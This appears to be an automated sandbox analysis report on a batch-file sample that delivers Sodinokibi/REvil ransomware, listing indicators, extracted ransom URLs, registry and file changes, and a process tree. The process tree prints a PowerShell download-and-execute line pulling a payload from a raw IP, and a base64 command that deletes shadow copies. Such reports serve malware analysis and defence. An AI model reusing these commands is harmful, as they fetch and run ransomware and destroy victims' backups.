Analysis
-
max time kernel
148s -
max time network
179s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
17-05-2020 00:10
Static task
static1
Behavioral task
behavioral1
Sample
eb472e31443cc485f086281fcb7b51d3.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
eb472e31443cc485f086281fcb7b51d3.bat
Resource
win10v200430
General
-
Target
eb472e31443cc485f086281fcb7b51d3.bat
-
Size
216B
-
MD5
0bf53bc18c108f0a372946b0adb06fea
-
SHA1
efac9fc02b506eeff1a25bd81b597fd063766f24
-
SHA256
5802b2494c7607bf862d8841fe92368c8adf31ae02c37308c62053c1a3d13888
-
SHA512
88403419d3dd18dfb06e613f3686aec3d202a8e0f64f0e6025ac789cd9ae3e7efc6c8e6cc95e83f2a1cbc87ae74da08c730cdfba96cda83868ee70f7442bdb08
Malware Config
Extracted
http://185.103.242.78/pastes/eb472e31443cc485f086281fcb7b51d3
Extracted
C:\908452242-read-me.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B7383768CA47FD80
http://decryptor.cc/B7383768CA47FD80
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1472 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1656 powershell.exe 1656 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe -
Blacklisted process makes network request 79 IoCs
Processes:
powershell.exeflow pid process 4 1472 powershell.exe 6 1472 powershell.exe 8 1472 powershell.exe 10 1472 powershell.exe 12 1472 powershell.exe 14 1472 powershell.exe 16 1472 powershell.exe 18 1472 powershell.exe 20 1472 powershell.exe 22 1472 powershell.exe 24 1472 powershell.exe 26 1472 powershell.exe 28 1472 powershell.exe 29 1472 powershell.exe 31 1472 powershell.exe 33 1472 powershell.exe 35 1472 powershell.exe 37 1472 powershell.exe 39 1472 powershell.exe 40 1472 powershell.exe 43 1472 powershell.exe 44 1472 powershell.exe 46 1472 powershell.exe 48 1472 powershell.exe 50 1472 powershell.exe 52 1472 powershell.exe 53 1472 powershell.exe 55 1472 powershell.exe 57 1472 powershell.exe 59 1472 powershell.exe 60 1472 powershell.exe 62 1472 powershell.exe 64 1472 powershell.exe 66 1472 powershell.exe 68 1472 powershell.exe 70 1472 powershell.exe 72 1472 powershell.exe 73 1472 powershell.exe 75 1472 powershell.exe 77 1472 powershell.exe 78 1472 powershell.exe 80 1472 powershell.exe 81 1472 powershell.exe 83 1472 powershell.exe 84 1472 powershell.exe 86 1472 powershell.exe 88 1472 powershell.exe 90 1472 powershell.exe 92 1472 powershell.exe 94 1472 powershell.exe 95 1472 powershell.exe 97 1472 powershell.exe 98 1472 powershell.exe 100 1472 powershell.exe 102 1472 powershell.exe 104 1472 powershell.exe 106 1472 powershell.exe 107 1472 powershell.exe 109 1472 powershell.exe 110 1472 powershell.exe 112 1472 powershell.exe 114 1472 powershell.exe 116 1472 powershell.exe 118 1472 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 22 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConnectInvoke.otf powershell.exe File opened for modification \??\c:\program files\RepairUninstall.doc powershell.exe File opened for modification \??\c:\program files\ResumeUnregister.jfif powershell.exe File opened for modification \??\c:\program files\SkipStart.ex_ powershell.exe File opened for modification \??\c:\program files\WatchShow.midi powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\908452242-read-me.txt powershell.exe File opened for modification \??\c:\program files\UseDebug.asp powershell.exe File created \??\c:\program files\908452242-read-me.txt powershell.exe File opened for modification \??\c:\program files\DisableRedo.asp powershell.exe File opened for modification \??\c:\program files\MeasureDisable.otf powershell.exe File opened for modification \??\c:\program files\NewLock.m4a powershell.exe File opened for modification \??\c:\program files\RestartExit.mp4v powershell.exe File opened for modification \??\c:\program files\SetWatch.mpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\908452242-read-me.txt powershell.exe File created \??\c:\program files (x86)\908452242-read-me.txt powershell.exe File opened for modification \??\c:\program files\ConnectRevoke.pps powershell.exe File created \??\c:\program files\microsoft sql server compact edition\908452242-read-me.txt powershell.exe File opened for modification \??\c:\program files\OptimizeUninstall.vsdx powershell.exe File opened for modification \??\c:\program files\SuspendLock.mp2 powershell.exe File opened for modification \??\c:\program files\WaitMove.rmi powershell.exe File opened for modification \??\c:\program files\SelectBackup.wma powershell.exe File opened for modification \??\c:\program files\TraceRemove.png powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z0w.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1388 wrote to memory of 1472 1388 cmd.exe powershell.exe PID 1472 wrote to memory of 1656 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1656 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1656 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1656 1472 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeBackupPrivilege 1976 vssvc.exe Token: SeRestorePrivilege 1976 vssvc.exe Token: SeAuditPrivilege 1976 vssvc.exe Token: SeTakeOwnershipPrivilege 1472 powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\58119F0E128287EA50FDD987456F4F78DCFAD6D4 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\58119F0E128287EA50FDD987456F4F78DCFAD6D4\Blob = 19000000010000001000000099c03958d4138c59ae87672beb67432a040000000100000010000000b3a53e77216dac4ac0c9fbd5413dca060f00000001000000140000004601bf416f3477a4d5894c25d2d84f96d440660703000000010000001400000058119f0e128287ea50fdd987456f4f78dcfad6d41d0000000100000010000000fa6bbd4f1df0b2d1e5562c770867e2bb0b000000010000001400000055005300450052005400720075007300740000001400000001000000140000005332d1b3cf7ffae0f1a05d854e92d29e451db44f090000000100000016000000301406082b0601050507030406082b0601050507030153000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c02000000001000000620400003082045e30820346a003020102021044be0c8b500021b411d32a6806a9ad69300d06092a864886f70d0101050500308193310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311b30190603550403131255544e202d2044415441436f727020534743301e170d3939303632343138353732315a170d3139303632343139303633305a308193310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311b30190603550403131255544e202d2044415441436f72702053474330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfee5810a22b6e55c48ebf2e4609e7e0080f2e2b7a13941bbdf6b6808e650593001ebcafe20f8e190d1247ecacada3fa2e70f8de6efb5642159e2e5cef23de21b9057627190f4fd6c39cb4be941963f2a6110aeb53489cbef2293b16e81aa04ca6c9f4185968c070f25300c05e5082a5566f36f94ae04486a04d4ed6476e494acb67d7a6c405b98e1ef4fcffcde736e09c056cb2332215d0b4e0cc17c0b2c0f4fe323f292a957bd8f2a74e0f547ca10d80b30903c1ff5cdd5e9a3ebcaebc478a6aae71ca1fb12ab85f42050bec4630d1720bcae9566df5efdf78be61bab2a5ae044cbca8ac691597bdefebb48cbf35f8d4c3d1280e5c3a9f7018332077c4a2af0203010001a381ab3081a8300b0603551d0f0404030201c6300f0603551d130101ff040530030101ff301d0603551d0e041604145332d1b3cf7ffae0f1a05d854e92d29e451db44f303d0603551d1f043630343032a030a02e862c687474703a2f2f63726c2e7573657274727573742e636f6d2f55544e2d44415441436f72705347432e63726c302a0603551d250423302106082b06010505070301060a2b0601040182370a030306096086480186f8420401300d06092a864886f70d01010505000382010100273597008a8b28bdc633301e29fce2f7d598d440bb60cabfab172c09367f50fa41dcae963a0a233e8959c9a307ed1b37adfc7cbe51495ade3a0a54081645c299b187cd8c68e06903e9c44e98b23b8c16b30ea00c98509b93a97009c82ca38fdf02e4e0713af1b42372a0aa01dfdf983e1450a03126bd28e95a302675f97b601c8df3cd50266d04279adfd50d4547296b2ce676d9a9297d32ddc9363cbdae35f1119e1dbb903f12474e8ed77e0f62731d5226381c1849fd30749ac4e5222fd8c08ded917a4c008f727f5ddadd1b8b456be7dd6997a8c5564c0f0cf69f7a9137f69782e0dd7169ff763f604d3ccff799f9c657f4c9553978ba2c79c9a6882bf408 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6631BF9EF74F9EB6C9D5A60CBA6ABED1F7BDEF7B\Blob = 1900000001000000100000005fe8d5c276ab7e4a038af71e53abfb1b0400000001000000100000005c48dcf74272ec56946d1ccc713580750f0000000100000014000000c1f49dacc04c76c9d07297565c4c2fda367b90dc0300000001000000140000006631bf9ef74f9eb6c9d5a60cba6abed1f7bdef7b1d0000000100000010000000f80f3f5ac1d39ec772f569fcac0d49441400000001000000140000000b58e58bc64c1537a440a930a921be47365a56ff0b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000210400003082041d30820305a00302010202104e812d8a8265e00b02ee3e350246e53d300d06092a864886f70d0101050500308181310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312730250603550403131e434f4d4f444f2043657274696669636174696f6e20417574686f72697479301e170d3036313230313030303030305a170d3239313233313233353935395a308181310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312730250603550403131e434f4d4f444f2043657274696669636174696f6e20417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100d0408b8b72e3911bf751c11b540498d3a9bfc1e68a5d3b87fbbb88ce0de32f3f0696f0a2295099aedb3ba157b0745171cded42914d41fea9c8d86a867744bb596697505eb4d42c7044cfda379542693c30c471b352f0214da1d8ba397c1c9ea3249df2831698aa167c439b155bb7ae3491fed4622618469a3febc1f9f19057ebac7a0d8bdb72306a66d5e046a370dc68d9ff04488977deb5e9fb676d41e9bc39bd32d96202f1b1a83d6e379ce22fe2d3a2268bc6b8554388e1233ea5d224396a47ab00d4a1b3a925fe0d3fa71dbad351c10ba4daac38ef55502405654693344f2d8dadc6d42119d28eca056171077347e58a1912bd044dce4e9ca548acbb26f70203010001a3818e30818b301d0603551d0e041604140b58e58bc64c1537a440a930a921be47365a56ff300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff30490603551d1f04423040303ea03ca03a8638687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f434f4d4f444f43657274696669636174696f6e417574686f726974792e63726c300d06092a864886f70d010105050003820101003e989e9bf61be9d739b778ae1d721849d387e44382eb3fc9aaf5a8b5ef557c215265f9d50de16cf43e8c9373912e02c44e07716fc08f386108a81e810ac02f202f418b91dc4845bcf1c6deba766b33c8002d31464cede79dcf8894ff33c056e8248626b8d83838df2a6bdd12ccc73f47174ca2c2069609d6dbfe3f3c4641df58e2560f3c3bc11c9335d93852aceec8ec2e304e9435b4241f4b7869daf20238cc955293f07025599c2067c4eef98b5761f492767d3f848d55b7e8e5acd5f1f51956a65afb901caf93ebe51cd467975d040ebe0b83a61783b93012a0c5331505b90dfbc70576e3d84a8dfc3417a3c62128be3045311ec778be586138ac3be20165 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6631BF9EF74F9EB6C9D5A60CBA6ABED1F7BDEF7B powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\eb472e31443cc485f086281fcb7b51d3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/eb472e31443cc485f086281fcb7b51d3');Invoke-WLKBSGRGV;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Modifies system certificate store
PID:1472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1976